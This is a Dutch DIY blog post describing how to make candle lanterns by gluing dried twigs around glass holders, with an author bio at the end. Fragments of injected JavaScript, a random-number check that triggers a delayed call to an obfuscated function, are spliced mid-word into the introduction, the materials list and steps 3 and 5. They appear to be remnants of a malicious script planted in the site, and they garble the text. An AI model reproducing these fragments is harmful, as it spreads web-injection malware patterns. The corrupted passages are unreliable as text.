Windlichten maak je eenvoudig zelf (DIY)

Als het sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tormt komen er altijd veel takken van de bomen af. Je kunt deze natuurlijk direct in de groene bak gooien, maar je kunt er ook iets leuks mee maken zoals deze windlichten.

windlichten diy

Wat heb je nodig?

– Veel kleine takjes

– Windlichten (klein of groot)

– Lijmpisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool met patronen

– Waxinelichtjes

– Snoeischaar

Aan de slag!

  1. Laat de takjes goed drogen op een krant voordat je ze gaat gebruiken. Als ze nog nat zijn dan blijft de lijm niet goed plakken en gaan de takjes rotten.
  2. Meet je windlicht op en knip de takjes op ongeveer dezelfde hoogte af. Dit gaat het makkelijkste met een snoeischaar. Het maakt niet uit als de ene tak wat langer is dan de ander. Dit ziet er juist wel speels uit.
  3. Lijm nu vervolgens de takjes in de rondte met het lijmpisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool. Druk de takjes goed aan zodat ze goed vast komen te zitten.
  4. Laat de lijm goed drogen!
  5. Je kunt eventueel nog een lint of dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touw om het windlicht heen doen ter decoratie.

Windlichten Inspiratie

Je kunt nog veel meer producten uit de natuur gebruiken om zelf windlichten mee te maken. Denk aan Lavendel, bladeren, zand, bloemen en dennenappels.

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Windlichten maak je eenvoudig zelf (DIY)"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.